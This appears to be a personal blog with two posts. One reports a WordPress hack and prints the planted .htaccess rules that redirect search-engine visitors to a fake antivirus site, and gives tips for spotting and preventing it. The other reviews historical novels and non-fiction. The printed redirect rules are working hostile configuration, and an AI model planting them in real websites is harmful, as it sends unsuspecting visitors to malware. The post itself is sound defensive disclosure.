not so lovely and cute hacks

Sites I've been involved with have been hacked several times over the last year. The most recent, I could not find much information on, so I though I would post some info about it. Basically, people who found the site through google were sent through a couple redirects, such that one ends up with something like this:





One's website is suddenly replaced with a big warning with text like "Warning: visiting this site may harm your computer", or "Attention! if your computer is struck by the spyware, you could suffer data loss, unusual PC behaviour, PC freezes and crashes..."

The URLs are things like "best-virus-scan.com" and "bestantivirusproscan.com"
If you come across these sites or messages -- I don't know for sure that they are malicious, but I would assume so. Close your browser.

The thing one might note (if someone for instance says "hey I'm trying to go to your site and see this weird message appear") is that these messages only appear when one goes to your site from google. If one came from another link, or type in the email address, one's site seems fine. And one might think - it's google's or AOL's or Yahoo's or MSN, Altavista, Ask.com or Live.com's problems.

In fact, what's going on is that the hacker found a way to use or overwrite you .htaccess file. This is what it looks like:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC]
RewriteRule .* {scrubbed a little}maseo.ru/h.php [R,L]
# END WordPress


The .htaccess file is called when the server is first pinged by the client -- and what this code does above is to look at the request and to look for the referer, i.e. where the link was clinked. And it only forwards it on to maseo.ru/h.php if it comes from one of those places (google, aol, msn, altavista, ask, yahoo and live).

Since there are probably not a few people who wouldn't think to check the .htaccess file (or wouldn't be sure how), the manager of the site might just think there is some problem with the search engine.

Now of course the question is how did the hacker manage to write this code onto the server. This is where I think Wordpress plays a role. Through what mechanism I'm not sure -- some SQL injection or cross site scripting, Word Press was coopted to write this file.

If you run multiple sites through the same management tool, make sure that they haven't also written an .htaccess file at a level up from the sites (which then all the sites seem to inherit). The hackers went one little step further on this one, and inserted a bunch of blank lines in the file, so that at initial look, the file looked empty. Make sure to scroll down.

Mostly though, make sure to stay on top of your wordpress updates. Assume hackers are always trying to probe these things (this may in fact all be automated). Of course, staying up with the updates is no insurance that all hacks will be caught in time, but it's all you got, and obscurity is no protection (alas). In cases like this it might just make you more vulnerable.

It would be nice if google actually sent some little notice when a site gets co-opted -- but I guess it wouldn't make them any money. I do wonder if there would be a way to make a spider to look for it and send notices myself. Hmmm.

Holiday Reading

One upside of the nasty illness I had over this vacation is that I got a lot of reading done:

I marched on through Bernard Cornwall's Sharpe's series, and they continue to be thoroughly engaging. Sharpe's Enemy was particularly timely as it took place during the winter time. It has a description of a Christmas dinner that was almost as good as eating -- but that may have just been because I had no appetite.

I also finished Cornwall's grail quest trilogy (the Archer's Tale, Vagabond, and Heretic). The story takes places in the reign of Edward the Third after he invaded France. I hadn't really known much about the English long bow outside of Henry V and the battle of Agincourt. Apparently, the long bow already had been ruling the battle field for some time, and was particular to England because of the peculiarities of culture (wielding the bow being the national sport before soccer came along I guess). History aside, it was a good read all told, the main character Thomas the archer is much like his other main characters (Sharpe and Starbuck) rash, passionate, and soldier's soldiers -- not knowing much outside of how to fight never mind why -- their enemies are often on the same side as not.

I also found a new author, Louis Bayard, with the book The Black Tower, a historical mystery of sorts taking place during France's restoration of the monarchy after the demise of Napolean. The main character becoming involved in the investigation of a murder. What makes the book is the investigator, a man named Vidocq. He's a great character (read the wikipedia article on him), somewhat Holmesian, but more passionate, a former criminal, a lover of women, a master of disguise, and the terror of criminals all through Paris.

Good stuff. I just started another book by Bayard, called Timothy, which is the life and times of Tiny Tim now all grown up.

I did plow through a couple non fiction books as well: Saxon, Viking and Celts by Bryan Sykes. This is an investigation into the DNA of the people of the British Isles, trying to match genetics to what we know or believed we knew of the actual history. The annoying thing about the book (for me) is that it as written as an unveiling of a mystery, rather than "these are my conclusions and this is how we arrived at them". For me, that makes it a little less trustworthy somehow -- since I don't know where it is going to end up, I guess I can't see where and if the author is making leaps.

In any case, the upshot of their findings is that the genetics maps pretty well to history from the 800s on (in terms of where say viking and saxon genes -- which are hard to distinguish -- are likely to be), but there is little evidence for the migrations that we thought made up earlier prehistory. The Celts have been there for thousands of years. What we know of as Celtic culture, was likely a cultural migration.

And speaking of migration, this brings me to my last book, The Gulf Stream: Tiny Plankton, Giant Bluefin, and the Amazing Story of the Powerful River in the Atlantic by Stan Ulanski. I had high hopes for this book but was ultimately left disappointed. I can be quite fond of books that are leap from connection to connection, but reading details on for example sport fishing, the story of edward teach, and the story of the Mayflower seemed either self-indulgent, or filler. I was surprised there was not a more thorough treatment how the biology of the stream -- there was lots of details on the tuna, sports fish, and jelly fish, but there was little in between. Whales weren't talked about at all until the author began talking about whaling. Cod was mentioned only in passing.

The other big missing element is much about the environment, how much the biology might have changed over the years (there's hint when he dissects a fish at one point and finds a bottle cap), and there is not a mention of the controversy over the conveyor and Global warming except in the epilogue.

By the end of it, I felt I would have been better served if the title had been, The Atlantic Gyre: how the Atlantic ocean spins biology and history. Or something like that. It does have great details on ocean dynamics, climate, and the history of humans crossing the Atlantic, but I feel like the gulf stream itself is still merely a river in the ocean, but that I know that it is more.